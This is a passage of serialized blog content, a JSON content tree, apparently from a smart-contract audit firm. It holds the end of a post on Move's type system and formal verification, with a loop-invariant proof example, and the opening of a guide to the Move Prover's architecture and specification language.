MINIMUM_LIQUIDITY;\n",{"type":28,"tag":116,"props":7981,"children":7982},{"class":245,"line":293},[7983],{"type":28,"tag":116,"props":7984,"children":7985},{"style":266},[7986],{"type":33,"value":406},{"type":28,"tag":29,"props":7988,"children":7989},{},[7990,7992,7998,8000,8006],{"type":33,"value":7991},"Another useful pattern for the Move prover is ",{"type":28,"tag":98,"props":7993,"children":7995},{"className":7994},[],[7996],{"type":33,"value":7997},"aborts_if",{"type":33,"value":7999},". More specifically, it can be very helpful to assert that a function never aborts, with ",{"type":28,"tag":98,"props":8001,"children":8003},{"className":8002},[],[8004],{"type":33,"value":8005},"aborts_if false",{"type":33,"value":141},{"type":28,"tag":29,"props":8008,"children":8009},{},[8010],{"type":33,"value":8011},"Although loop invariants are a bit clunky, Ian is also able to prove that a relatively nontrivial function doesn't abort.",{"type":28,"tag":234,"props":8013,"children":8015},{"className":2652,"code":8014,"language":2651,"meta":7,"style":7},"  fun multiply_vec_by_n_coins(input: vector\u003Cu64>): vector\u003Cu128> {\n      let amounts_times_coins = vector::empty\u003Cu128>();\n      let i = 0;\n      let n_coins = vector::length(&input);\n      while ({\n          spec {\n              invariant len(amounts_times_coins) == i;\n              invariant i \u003C= n_coins;\n              invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n          };\n          (i \u003C n_coins)\n      }) {\n          vector::push_back(\n              &mut amounts_times_coins,\n              (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n          );\n          i = i + 1;\n      };\n      spec {\n          assert i == n_coins;\n          assert len(input) == n_coins;\n      };\n      amounts_times_coins\n  }\n  spec multiply_vec_by_n_coins {\n      pragma opaque;\n      aborts_if false;\n      ensures len(result) == len(input);\n      ensures forall j in 0..len(input): result[j] == input[j] * len(input);\n  }\n",[8016],{"type":28,"tag":98,"props":8017,"children":8018},{"__ignoreMap":7},[8019,8083,8125,8148,8193,8206,8218,8256,8279,8367,8375,8400,8408,8429,8449,8548,8556,8584,8592,8604,8628,8663,8670,8678,8685,8700,8716,8732,8776,8881],{"type":28,"tag":116,"props":8020,"children":8021},{"class":245,"line":246},[8022,8026,8031,8035,8040,8044,8049,8053,8057,8062,8066,8070,8074,8079],{"type":28,"tag":116,"props":8023,"children":8024},{"style":272},[8025],{"type":33,"value":6241},{"type":28,"tag":116,"props":8027,"children":8028},{"style":282},[8029],{"type":33,"value":8030}," multiply_vec_by_n_coins",{"type":28,"tag":116,"props":8032,"children":8033},{"style":266},[8034],{"type":33,"value":313},{"type":28,"tag":116,"props":8036,"children":8037},{"style":272},[8038],{"type":33,"value":8039},"input",{"type":28,"tag":116,"props":8041,"children":8042},{"style":370},[8043],{"type":33,"value":4160},{"type":28,"tag":116,"props":8045,"children":8046},{"style":272},[8047],{"type":33,"value":8048}," vector",{"type":28,"tag":116,"props":8050,"children":8051},{"style":266},[8052],{"type":33,"value":514},{"type":28,"tag":116,"props":8054,"children":8055},{"style":339},[8056],{"type":33,"value":7714},{"type":28,"tag":116,"props":8058,"children":8059},{"style":266},[8060],{"type":33,"value":8061},">)",{"type":28,"tag":116,"props":8063,"children":8064},{"style":370},[8065],{"type":33,"value":4160},{"type":28,"tag":116,"props":8067,"children":8068},{"style":272},[8069],{"type":33,"value":8048},{"type":28,"tag":116,"props":8071,"children":8072},{"style":266},[8073],{"type":33,"value":514},{"type":28,"tag":116,"props":8075,"children":8076},{"style":339},[8077],{"type":33,"value":8078},"u128",{"type":28,"tag":116,"props":8080,"children":8081},{"style":266},[8082],{"type":33,"value":6952},{"type":28,"tag":116,"props":8084,"children":8085},{"class":245,"line":256},[8086,8090,8095,8099,8103,8107,8112,8116,8120],{"type":28,"tag":116,"props":8087,"children":8088},{"style":376},[8089],{"type":33,"value":7747},{"type":28,"tag":116,"props":8091,"children":8092},{"style":272},[8093],{"type":33,"value":8094}," amounts_times_coins",{"type":28,"tag":116,"props":8096,"children":8097},{"style":370},[8098],{"type":33,"value":2226},{"type":28,"tag":116,"props":8100,"children":8101},{"style":266},[8102],{"type":33,"value":8048},{"type":28,"tag":116,"props":8104,"children":8105},{"style":370},[8106],{"type":33,"value":3151},{"type":28,"tag":116,"props":8108,"children":8109},{"style":272},[8110],{"type":33,"value":8111},"empty",{"type":28,"tag":116,"props":8113,"children":8114},{"style":266},[8115],{"type":33,"value":514},{"type":28,"tag":116,"props":8117,"children":8118},{"style":339},[8119],{"type":33,"value":8078},{"type":28,"tag":116,"props":8121,"children":8122},{"style":266},[8123],{"type":33,"value":8124},">();\n",{"type":28,"tag":116,"props":8126,"children":8127},{"class":245,"line":293},[8128,8132,8136,8140,8144],{"type":28,"tag":116,"props":8129,"children":8130},{"style":376},[8131],{"type":33,"value":7747},{"type":28,"tag":116,"props":8133,"children":8134},{"style":272},[8135],{"type":33,"value":3068},{"type":28,"tag":116,"props":8137,"children":8138},{"style":370},[8139],{"type":33,"value":2226},{"type":28,"tag":116,"props":8141,"children":8142},{"style":350},[8143],{"type":33,"value":2718},{"type":28,"tag":116,"props":8145,"children":8146},{"style":266},[8147],{"type":33,"value":384},{"type":28,"tag":116,"props":8149,"children":8150},{"class":245,"line":361},[8151,8155,8160,8164,8168,8172,8177,8181,8185,8189],{"type":28,"tag":116,"props":8152,"children":8153},{"style":376},[8154],{"type":33,"value":7747},{"type":28,"tag":116,"props":8156,"children":8157},{"style":272},[8158],{"type":33,"value":8159}," n_coins",{"type":28,"tag":116,"props":8161,"children":8162},{"style":370},[8163],{"type":33,"value":2226},{"type":28,"tag":116,"props":8165,"children":8166},{"style":266},[8167],{"type":33,"value":8048},{"type":28,"tag":116,"props":8169,"children":8170},{"style":370},[8171],{"type":33,"value":3151},{"type":28,"tag":116,"props":8173,"children":8174},{"style":282},[8175],{"type":33,"value":8176},"length",{"type":28,"tag":116,"props":8178,"children":8179},{"style":266},[8180],{"type":33,"value":313},{"type":28,"tag":116,"props":8182,"children":8183},{"style":370},[8184],{"type":33,"value":2780},{"type":28,"tag":116,"props":8186,"children":8187},{"style":272},[8188],{"type":33,"value":8039},{"type":28,"tag":116,"props":8190,"children":8191},{"style":266},[8192],{"type":33,"value":895},{"type":28,"tag":116,"props":8194,"children":8195},{"class":245,"line":387},[8196,8201],{"type":28,"tag":116,"props":8197,"children":8198},{"style":260},[8199],{"type":33,"value":8200},"      while",{"type":28,"tag":116,"props":8202,"children":8203},{"style":266},[8204],{"type":33,"value":8205}," ({\n",{"type":28,"tag":116,"props":8207,"children":8208},{"class":245,"line":400},[8209,8214],{"type":28,"tag":116,"props":8210,"children":8211},{"style":272},[8212],{"type":33,"value":8213},"          spec",{"type":28,"tag":116,"props":8215,"children":8216},{"style":266},[8217],{"type":33,"value":1291},{"type":28,"tag":116,"props":8219,"children":8220},{"class":245,"line":614},[8221,8226,8231,8235,8240,8244,8248,8252],{"type":28,"tag":116,"props":8222,"children":8223},{"style":272},[8224],{"type":33,"value":8225},"              invariant",{"type":28,"tag":116,"props":8227,"children":8228},{"style":282},[8229],{"type":33,"value":8230}," len",{"type":28,"tag":116,"props":8232,"children":8233},{"style":266},[8234],{"type":33,"value":313},{"type":28,"tag":116,"props":8236,"children":8237},{"style":272},[8238],{"type":33,"value":8239},"amounts_times_coins",{"type":28,"tag":116,"props":8241,"children":8242},{"style":266},[8243],{"type":33,"value":1609},{"type":28,"tag":116,"props":8245,"children":8246},{"style":370},[8247],{"type":33,"value":2340},{"type":28,"tag":116,"props":8249,"children":8250},{"style":272},[8251],{"type":33,"value":3068},{"type":28,"tag":116,"props":8253,"children":8254},{"style":266},[8255],{"type":33,"value":384},{"type":28,"tag":116,"props":8257,"children":8258},{"class":245,"line":631},[8259,8263,8267,8271,8275],{"type":28,"tag":116,"props":8260,"children":8261},{"style":272},[8262],{"type":33,"value":8225},{"type":28,"tag":116,"props":8264,"children":8265},{"style":272},[8266],{"type":33,"value":3068},{"type":28,"tag":116,"props":8268,"children":8269},{"style":370},[8270],{"type":33,"value":7869},{"type":28,"tag":116,"props":8272,"children":8273},{"style":272},[8274],{"type":33,"value":8159},{"type":28,"tag":116,"props":8276,"children":8277},{"style":266},[8278],{"type":33,"value":384},{"type":28,"tag":116,"props":8280,"children":8281},{"class":245,"line":665},[8282,8286,8291,8296,8300,8304,8308,8312,8316,8320,8324,8329,8334,8338,8343,8347,8351,8355,8359,8363],{"type":28,"tag":116,"props":8283,"children":8284},{"style":272},[8285],{"type":33,"value":8225},{"type":28,"tag":116,"props":8287,"children":8288},{"style":272},[8289],{"type":33,"value":8290}," forall",{"type":28,"tag":116,"props":8292,"children":8293},{"style":272},[8294],{"type":33,"value":8295}," j",{"type":28,"tag":116,"props":8297,"children":8298},{"style":376},[8299],{"type":33,"value":2713},{"type":28,"tag":116,"props":8301,"children":8302},{"style":350},[8303],{"type":33,"value":2718},{"type":28,"tag":116,"props":8305,"children":8306},{"style":370},[8307],{"type":33,"value":2723},{"type":28,"tag":116,"props":8309,"children":8310},{"style":272},[8311],{"type":33,"value":3408},{"type":28,"tag":116,"props":8313,"children":8314},{"style":370},[8315],{"type":33,"value":4160},{"type":28,"tag":116,"props":8317,"children":8318},{"style":272},[8319],{"type":33,"value":8094},{"type":28,"tag":116,"props":8321,"children":8322},{"style":266},[8323],{"type":33,"value":347},{"type":28,"tag":116,"props":8325,"children":8326},{"style":272},[8327],{"type":33,"value":8328},"j",{"type":28,"tag":116,"props":8330,"children":8331},{"style":266},[8332],{"type":33,"value":8333},"] ",{"type":28,"tag":116,"props":8335,"children":8336},{"style":370},[8337],{"type":33,"value":2340},{"type":28,"tag":116,"props":8339,"children":8340},{"style":272},[8341],{"type":33,"value":8342}," input",{"type":28,"tag":116,"props":8344,"children":8345},{"style":266},[8346],{"type":33,"value":347},{"type":28,"tag":116,"props":8348,"children":8349},{"style":272},[8350],{"type":33,"value":8328},{"type":28,"tag":116,"props":8352,"children":8353},{"style":266},[8354],{"type":33,"value":8333},{"type":28,"tag":116,"props":8356,"children":8357},{"style":370},[8358],{"type":33,"value":4240},{"type":28,"tag":116,"props":8360,"children":8361},{"style":272},[8362],{"type":33,"value":8159},{"type":28,"tag":116,"props":8364,"children":8365},{"style":266},[8366],{"type":33,"value":384},{"type":28,"tag":116,"props":8368,"children":8369},{"class":245,"line":713},[8370],{"type":28,"tag":116,"props":8371,"children":8372},{"style":266},[8373],{"type":33,"value":8374},"          };\n",{"type":28,"tag":116,"props":8376,"children":8377},{"class":245,"line":750},[8378,8383,8387,8392,8396],{"type":28,"tag":116,"props":8379,"children":8380},{"style":266},[8381],{"type":33,"value":8382},"          (",{"type":28,"tag":116,"props":8384,"children":8385},{"style":272},[8386],{"type":33,"value":3408},{"type":28,"tag":116,"props":8388,"children":8389},{"style":370},[8390],{"type":33,"value":8391}," \u003C",{"type":28,"tag":116,"props":8393,"children":8394},{"style":272},[8395],{"type":33,"value":8159},{"type":28,"tag":116,"props":8397,"children":8398},{"style":266},[8399],{"type":33,"value":2830},{"type":28,"tag":116,"props":8401,"children":8402},{"class":245,"line":779},[8403],{"type":28,"tag":116,"props":8404,"children":8405},{"style":266},[8406],{"type":33,"value":8407},"      }) {\n",{"type":28,"tag":116,"props":8409,"children":8410},{"class":245,"line":796},[8411,8416,8420,8425],{"type":28,"tag":116,"props":8412,"children":8413},{"style":266},[8414],{"type":33,"value":8415},"          vector",{"type":28,"tag":116,"props":8417,"children":8418},{"style":370},[8419],{"type":33,"value":3151},{"type":28,"tag":116,"props":8421,"children":8422},{"style":282},[8423],{"type":33,"value":8424},"push_back",{"type":28,"tag":116,"props":8426,"children":8427},{"style":266},[8428],{"type":33,"value":3133},{"type":28,"tag":116,"props":8430,"children":8431},{"class":245,"line":847},[8432,8437,8441,8445],{"type":28,"tag":116,"props":8433,"children":8434},{"style":370},[8435],{"type":33,"value":8436},"              &",{"type":28,"tag":116,"props":8438,"children":8439},{"style":376},[8440],{"type":33,"value":3394},{"type":28,"tag":116,"props":8442,"children":8443},{"style":272},[8444],{"type":33,"value":8094},{"type":28,"tag":116,"props":8446,"children":8447},{"style":266},[8448],{"type":33,"value":3178},{"type":28,"tag":116,"props":8450,"children":8451},{"class":245,"line":898},[8452,8457,8461,8466,8470,8475,8479,8483,8487,8492,8496,8501,8505,8509,8514,8519,8523,8527,8531,8536,8540,8544],{"type":28,"tag":116,"props":8453,"children":8454},{"style":266},[8455],{"type":33,"value":8456},"              (",{"type":28,"tag":116,"props":8458,"children":8459},{"style":370},[8460],{"type":33,"value":4240},{"type":28,"tag":116,"props":8462,"children":8463},{"style":266},[8464],{"type":33,"value":8465},"vector",{"type":28,"tag":116,"props":8467,"children":8468},{"style":370},[8469],{"type":33,"value":3151},{"type":28,"tag":116,"props":8471,"children":8472},{"style":282},[8473],{"type":33,"value":8474},"borrow",{"type":28,"tag":116,"props":8476,"children":8477},{"style":266},[8478],{"type":33,"value":313},{"type":28,"tag":116,"props":8480,"children":8481},{"style":370},[8482],{"type":33,"value":2780},{"type":28,"tag":116,"props":8484,"children":8485},{"style":272},[8486],{"type":33,"value":8039},{"type":28,"tag":116,"props":8488,"children":8489},{"style":266},[8490],{"type":33,"value":8491},", (",{"type":28,"tag":116,"props":8493,"children":8494},{"style":272},[8495],{"type":33,"value":3408},{"type":28,"tag":116,"props":8497,"children":8498},{"style":376},[8499],{"type":33,"value":8500}," as",{"type":28,"tag":116,"props":8502,"children":8503},{"style":339},[8504],{"type":33,"value":5531},{"type":28,"tag":116,"props":8506,"children":8507},{"style":266},[8508],{"type":33,"value":2390},{"type":28,"tag":116,"props":8510,"children":8511},{"style":376},[8512],{"type":33,"value":8513},"as",{"type":28,"tag":116,"props":8515,"children":8516},{"style":339},[8517],{"type":33,"value":8518}," u128",{"type":28,"tag":116,"props":8520,"children":8521},{"style":266},[8522],{"type":33,"value":1609},{"type":28,"tag":116,"props":8524,"children":8525},{"style":370},[8526],{"type":33,"value":4240},{"type":28,"tag":116,"props":8528,"children":8529},{"style":266},[8530],{"type":33,"value":269},{"type":28,"tag":116,"props":8532,"children":8533},{"style":272},[8534],{"type":33,"value":8535},"n_coins",{"type":28,"tag":116,"props":8537,"children":8538},{"style":376},[8539],{"type":33,"value":8500},{"type":28,"tag":116,"props":8541,"children":8542},{"style":339},[8543],{"type":33,"value":8518},{"type":28,"tag":116,"props":8545,"children":8546},{"style":266},[8547],{"type":33,"value":2830},{"type":28,"tag":116,"props":8549,"children":8550},{"class":245,"line":907},[8551],{"type":28,"tag":116,"props":8552,"children":8553},{"style":266},[8554],{"type":33,"value":8555},"          );\n",{"type":28,"tag":116,"props":8557,"children":8558},{"class":245,"line":981},[8559,8564,8568,8572,8576,8580],{"type":28,"tag":116,"props":8560,"children":8561},{"style":272},[8562],{"type":33,"value":8563},"          i",{"type":28,"tag":116,"props":8565,"children":8566},{"style":370},[8567],{"type":33,"value":2226},{"type":28,"tag":116,"props":8569,"children":8570},{"style":272},[8571],{"type":33,"value":3068},{"type":28,"tag":116,"props":8573,"children":8574},{"style":370},[8575],{"type":33,"value":2258},{"type":28,"tag":116,"props":8577,"children":8578},{"style":350},[8579],{"type":33,"value":4192},{"type":28,"tag":116,"props":8581,"children":8582},{"style":266},[8583],{"type":33,"value":384},{"type":28,"tag":116,"props":8585,"children":8586},{"class":245,"line":1011},[8587],{"type":28,"tag":116,"props":8588,"children":8589},{"style":266},[8590],{"type":33,"value":8591},"      };\n",{"type":28,"tag":116,"props":8593,"children":8594},{"class":245,"line":1029},[8595,8600],{"type":28,"tag":116,"props":8596,"children":8597},{"style":272},[8598],{"type":33,"value":8599},"      spec",{"type":28,"tag":116,"props":8601,"children":8602},{"style":266},[8603],{"type":33,"value":1291},{"type":28,"tag":116,"props":8605,"children":8606},{"class":245,"line":1038},[8607,8612,8616,8620,8624],{"type":28,"tag":116,"props":8608,"children":8609},{"style":272},[8610],{"type":33,"value":8611},"          assert",{"type":28,"tag":116,"props":8613,"children":8614},{"style":272},[8615],{"type":33,"value":3068},{"type":28,"tag":116,"props":8617,"children":8618},{"style":370},[8619],{"type":33,"value":2953},{"type":28,"tag":116,"props":8621,"children":8622},{"style":272},[8623],{"type":33,"value":8159},{"type":28,"tag":116,"props":8625,"children":8626},{"style":266},[8627],{"type":33,"value":384},{"type":28,"tag":116,"props":8629,"children":8630},{"class":245,"line":1047},[8631,8635,8639,8643,8647,8651,8655,8659],{"type":28,"tag":116,"props":8632,"children":8633},{"style":272},[8634],{"type":33,"value":8611},{"type":28,"tag":116,"props":8636,"children":8637},{"style":282},[8638],{"type":33,"value":8230},{"type":28,"tag":116,"props":8640,"children":8641},{"style":266},[8642],{"type":33,"value":313},{"type":28,"tag":116,"props":8644,"children":8645},{"style":272},[8646],{"type":33,"value":8039},{"type":28,"tag":116,"props":8648,"children":8649},{"style":266},[8650],{"type":33,"value":1609},{"type":28,"tag":116,"props":8652,"children":8653},{"style":370},[8654],{"type":33,"value":2340},{"type":28,"tag":116,"props":8656,"children":8657},{"style":272},[8658],{"type":33,"value":8159},{"type":28,"tag":116,"props":8660,"children":8661},{"style":266},[8662],{"type":33,"value":384},{"type":28,"tag":116,"props":8664,"children":8665},{"class":245,"line":1071},[8666],{"type":28,"tag":116,"props":8667,"children":8668},{"style":266},[8669],{"type":33,"value":8591},{"type":28,"tag":116,"props":8671,"children":8672},{"class":245,"line":1137},[8673],{"type":28,"tag":116,"props":8674,"children":8675},{"style":272},[8676],{"type":33,"value":8677},"      amounts_times_coins\n",{"type":28,"tag":116,"props":8679,"children":8680},{"class":245,"line":1181},[8681],{"type":28,"tag":116,"props":8682,"children":8683},{"style":266},[8684],{"type":33,"value":5543},{"type":28,"tag":116,"props":8686,"children":8687},{"class":245,"line":1212},[8688,8692,8696],{"type":28,"tag":116,"props":8689,"children":8690},{"style":272},[8691],{"type":33,"value":7817},{"type":28,"tag":116,"props":8693,"children":8694},{"style":272},[8695],{"type":33,"value":8030},{"type":28,"tag":116,"props":8697,"children":8698},{"style":266},[8699],{"type":33,"value":1291},{"type":28,"tag":116,"props":8701,"children":8702},{"class":245,"line":1254},[8703,8707,8712],{"type":28,"tag":116,"props":8704,"children":8705},{"style":272},[8706],{"type":33,"value":7833},{"type":28,"tag":116,"props":8708,"children":8709},{"style":272},[8710],{"type":33,"value":8711}," opaque",{"type":28,"tag":116,"props":8713,"children":8714},{"style":266},[8715],{"type":33,"value":384},{"type":28,"tag":116,"props":8717,"children":8718},{"class":245,"line":1262},[8719,8724,8728],{"type":28,"tag":116,"props":8720,"children":8721},{"style":272},[8722],{"type":33,"value":8723},"      aborts_if",{"type":28,"tag":116,"props":8725,"children":8726},{"style":376},[8727],{"type":33,"value":1022},{"type":28,"tag":116,"props":8729,"children":8730},{"style":266},[8731],{"type":33,"value":384},{"type":28,"tag":116,"props":8733,"children":8734},{"class":245,"line":1294},[8735,8739,8743,8747,8752,8756,8760,8764,8768,8772],{"type":28,"tag":116,"props":8736,"children":8737},{"style":272},[8738],{"type":33,"value":7859},{"type":28,"tag":116,"props":8740,"children":8741},{"style":282},[8742],{"type":33,"value":8230},{"type":28,"tag":116,"props":8744,"children":8745},{"style":266},[8746],{"type":33,"value":313},{"type":28,"tag":116,"props":8748,"children":8749},{"style":272},[8750],{"type":33,"value":8751},"result",{"type":28,"tag":116,"props":8753,"children":8754},{"style":266},[8755],{"type":33,"value":1609},{"type":28,"tag":116,"props":8757,"children":8758},{"style":370},[8759],{"type":33,"value":2340},{"type":28,"tag":116,"props":8761,"children":8762},{"style":282},[8763],{"type":33,"value":8230},{"type":28,"tag":116,"props":8765,"children":8766},{"style":266},[8767],{"type":33,"value":313},{"type":28,"tag":116,"props":8769,"children":8770},{"style":272},[8771],{"type":33,"value":8039},{"type":28,"tag":116,"props":8773,"children":8774},{"style":266},[8775],{"type":33,"value":895},{"type":28,"tag":116,"props":8777,"children":8778},{"class":245,"line":1334},[8779,8783,8787,8791,8795,8799,8803,8808,8812,8816,8820,8824,8829,8833,8837,8841,8845,8849,8853,8857,8861,8865,8869,8873,8877],{"type":28,"tag":116,"props":8780,"children":8781},{"style":272},[8782],{"type":33,"value":7859},{"type":28,"tag":116,"props":8784,"children":8785},{"style":272},[8786],{"type":33,"value":8290},{"type":28,"tag":116,"props":8788,"children":8789},{"style":272},[8790],{"type":33,"value":8295},{"type":28,"tag":116,"props":8792,"children":8793},{"style":376},[8794],{"type":33,"value":2713},{"type":28,"tag":116,"props":8796,"children":8797},{"style":350},[8798],{"type":33,"value":2718},{"type":28,"tag":116,"props":8800,"children":8801},{"style":370},[8802],{"type":33,"value":2723},{"type":28,"tag":116,"props":8804,"children":8805},{"style":282},[8806],{"type":33,"value":8807},"len",{"type":28,"tag":116,"props":8809,"children":8810},{"style":266},[8811],{"type":33,"value":313},{"type":28,"tag":116,"props":8813,"children":8814},{"style":272},[8815],{"type":33,"value":8039},{"type":28,"tag":116,"props":8817,"children":8818},{"style":266},[8819],{"type":33,"value":1829},{"type":28,"tag":116,"props":8821,"children":8822},{"style":370},[8823],{"type":33,"value":4160},{"type":28,"tag":116,"props":8825,"children":8826},{"style":272},[8827],{"type":33,"value":8828}," result",{"type":28,"tag":116,"props":8830,"children":8831},{"style":266},[8832],{"type":33,"value":347},{"type":28,"tag":116,"props":8834,"children":8835},{"style":272},[8836],{"type":33,"value":8328},{"type":28,"tag":116,"props":8838,"children":8839},{"style":266},[8840],{"type":33,"value":8333},{"type":28,"tag":116,"props":8842,"children":8843},{"style":370},[8844],{"type":33,"value":2340},{"type":28,"tag":116,"props":8846,"children":8847},{"style":272},[8848],{"type":33,"value":8342},{"type":28,"tag":116,"props":8850,"children":8851},{"style":266},[8852],{"type":33,"value":347},{"type":28,"tag":116,"props":8854,"children":8855},{"style":272},[8856],{"type":33,"value":8328},{"type":28,"tag":116,"props":8858,"children":8859},{"style":266},[8860],{"type":33,"value":8333},{"type":28,"tag":116,"props":8862,"children":8863},{"style":370},[8864],{"type":33,"value":4240},{"type":28,"tag":116,"props":8866,"children":8867},{"style":282},[8868],{"type":33,"value":8230},{"type":28,"tag":116,"props":8870,"children":8871},{"style":266},[8872],{"type":33,"value":313},{"type":28,"tag":116,"props":8874,"children":8875},{"style":272},[8876],{"type":33,"value":8039},{"type":28,"tag":116,"props":8878,"children":8879},{"style":266},[8880],{"type":33,"value":895},{"type":28,"tag":116,"props":8882,"children":8883},{"class":245,"line":1372},[8884],{"type":28,"tag":116,"props":8885,"children":8886},{"style":266},[8887],{"type":33,"value":5543},{"type":28,"tag":63,"props":8889,"children":8890},{"id":4980},[8891],{"type":33,"value":4983},{"type":28,"tag":29,"props":8893,"children":8894},{},[8895],{"type":33,"value":8896},"In this post, we explored implications of Move's type system and formal verification, two powerful features of the Move language that enable safer programming languages.",{"type":28,"tag":29,"props":8898,"children":8899},{},[8900],{"type":33,"value":8901},"While Move as a language is still a language in active development, it shows some exciting features that seem allows developers to create structurally safer programs.",{"type":28,"tag":29,"props":8903,"children":8904},{},[8905,8907,8914],{"type":33,"value":8906},"We're passionate about pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":28,"tag":87,"props":8908,"children":8911},{"href":8909,"rel":8910},"https://twitter.com/notdeghost/",[91],[8912],{"type":33,"value":8913},"@notdeghost",{"type":33,"value":141},{"type":28,"tag":2516,"props":8916,"children":8917},{},[8918],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":8920},[8921,8922,8923],{"id":5430,"depth":256,"text":5433},{"id":7468,"depth":256,"text":7471},{"id":4980,"depth":256,"text":4983},"content:blog:2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction",{"_path":8928,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8929,"description":8930,"author":5391,"image":8931,"date":8934,"isFeatured":19,"tags":8935,"onBlogPage":19,"body":8938,"_type":2534,"_id":13279,"_source":2536,"_file":13280,"_stem":13281,"_extension":2539},"/blog/2022-09-16-move-prover","The Move Prover: A Guide","A practical guide to the Move Prover - tutorial, case study, and specifications.",{"src":8932,"height":8933,"width":5395},"/posts/move-prover/move-prover-title.jpg",1019,"2022-09-16",[8936,8937],"move","tutorial",{"type":25,"children":8939,"toc":13265},[8940,8959,8971,8977,8982,8987,8992,9001,9006,9020,9025,9031,9036,9050,9055,9192,9205,9210,9231,9265,9276,9281,9286,9296,9309,9651,9665,9683,9728,9741,9760,9932,9937,9942,9967,9972,10572,10584,10596,10601,10615,10620,10633,10674,10679,10711,10716,10721,10734,11119,11146,11353,11358,11370,11607,11612,11620,11639,11987,11992,12148,12153,12160,12174,12180,12185,12190,12196,12209,12440,12446,12451,12471,12740,12745,12751,12763,12768,12782,12788,12824,12924,12945,12951,12956,12961,13213,13218,13236,13240,13245,13250,13261],{"type":28,"tag":29,"props":8941,"children":8942},{},[8943,8945,8950,8952,8957],{"type":33,"value":8944},"Formal verification -- a powerful tool for ",{"type":28,"tag":2583,"props":8946,"children":8947},{},[8948],{"type":33,"value":8949},"proving",{"type":33,"value":8951}," the correctness of your programs. How does it ",{"type":28,"tag":2583,"props":8953,"children":8954},{},[8955],{"type":33,"value":8956},"actually",{"type":33,"value":8958}," work? This blog post will provide practical tips to help you use the Move Prover to its fullest potential, as well as explore a real-world example of how we used formal verification to secure a smart contract.",{"type":28,"tag":29,"props":8960,"children":8961},{},[8962,8964,8969],{"type":33,"value":8963},"At a high level, formal verification allows you to provide a specification for the program. This specification is then checked against symbolic inputs, allowing you to prove that your code follows the specification for ",{"type":28,"tag":2583,"props":8965,"children":8966},{},[8967],{"type":33,"value":8968},"all",{"type":33,"value":8970}," possible inputs.",{"type":28,"tag":63,"props":8972,"children":8974},{"id":8973},"move-prover",[8975],{"type":33,"value":8976},"Move Prover",{"type":28,"tag":29,"props":8978,"children":8979},{},[8980],{"type":33,"value":8981},"The Move Prover is an automated tool that allows developers to formally verify smart contracts written in the Move programming language.",{"type":28,"tag":29,"props":8983,"children":8984},{},[8985],{"type":33,"value":8986},"Move was primarily designed to facilitate automatic verification. Interestingly, the Move Prove operates on the Move bytecode itself, avoiding potential compiler bugs from interfering with prover correctness.",{"type":28,"tag":29,"props":8988,"children":8989},{},[8990],{"type":33,"value":8991},"The architecture of the tool consists of multiple components as illustrated below.",{"type":28,"tag":29,"props":8993,"children":8994},{},[8995],{"type":28,"tag":206,"props":8996,"children":9000},{"alt":8997,"src":8998,"title":8999},"Move Prover arch","https://i.imgur.com/ti4vkTu.png","Move Prover Architecture",[],{"type":28,"tag":29,"props":9002,"children":9003},{},[9004],{"type":33,"value":9005},"First, the Move prover receives a Move source file (an input) that contains specifications of the intended behavior of the program. Those specifications are then extracted from the annotated source by the Move Parser. Consequently, the tool compiles the source code into Move bytecode which is verified and converted into a prover object model plus the specification system \"blueprint\".",{"type":28,"tag":29,"props":9007,"children":9008},{},[9009,9011,9018],{"type":33,"value":9010},"The model is translated into an intermediate language, called ",{"type":28,"tag":87,"props":9012,"children":9015},{"href":9013,"rel":9014},"https://www.microsoft.com/en-us/research/project/boogie-an-intermediate-verification-language/",[91],[9016],{"type":33,"value":9017},"Boogie",{"type":33,"value":9019},". This Boogie code is then passed to the Boogie verification system which generates the input for the solver using a \"verification condition generation\". The verification condition (VC) is passed to an automated theorem prover (Z3).",{"type":28,"tag":29,"props":9021,"children":9022},{},[9023],{"type":33,"value":9024},"Once the VC is passed to the Z3, the prover checks if the SMT formula is unsatisfiable. If so, it means that the specifications hold. Otherwise, a model that satisfies the conditions is generated and converted back into Boogie format in order to issue a diagnosis report. The diagnosis report is then reverted to a source-level error which parallels a standard compiler error.",{"type":28,"tag":63,"props":9026,"children":9028},{"id":9027},"move-specification-language",[9029],{"type":33,"value":9030},"Move Specification Language",{"type":28,"tag":29,"props":9032,"children":9033},{},[9034],{"type":33,"value":9035},"Move MSL is a subset of the Move Language, which introduces support to statically describe the behavior about the correctness of a program with no implications on production.",{"type":28,"tag":29,"props":9037,"children":9038},{},[9039,9041,9048],{"type":33,"value":9040},"To better understand how to use the MSL, we will use ",{"type":28,"tag":87,"props":9042,"children":9045},{"href":9043,"rel":9044},"https://github.com/pontem-network/u256",[91],[9046],{"type":33,"value":9047},"Pontem's U256 library",{"type":33,"value":9049},", an open source Move library which implements support for U256 numbers, as a case study.",{"type":28,"tag":29,"props":9051,"children":9052},{},[9053],{"type":33,"value":9054},"The U256 number is implemented as a struct which contains 4 u64 numbers.",{"type":28,"tag":234,"props":9056,"children":9058},{"code":9057,"language":2651,"meta":7,"className":2652,"style":7},"struct U256 has copy, drop, store {\n    v0: u64,\n    v1: u64,\n    v2: u64,\n    v3: u64,\n}\n",[9059],{"type":28,"tag":98,"props":9060,"children":9061},{"__ignoreMap":7},[9062,9105,9125,9145,9165,9185],{"type":28,"tag":116,"props":9063,"children":9064},{"class":245,"line":246},[9065,9070,9074,9079,9084,9088,9093,9097,9101],{"type":28,"tag":116,"props":9066,"children":9067},{"style":376},[9068],{"type":33,"value":9069},"struct",{"type":28,"tag":116,"props":9071,"children":9072},{"style":339},[9073],{"type":33,"value":4400},{"type":28,"tag":116,"props":9075,"children":9076},{"style":272},[9077],{"type":33,"value":9078}," has",{"type":28,"tag":116,"props":9080,"children":9081},{"style":272},[9082],{"type":33,"value":9083}," 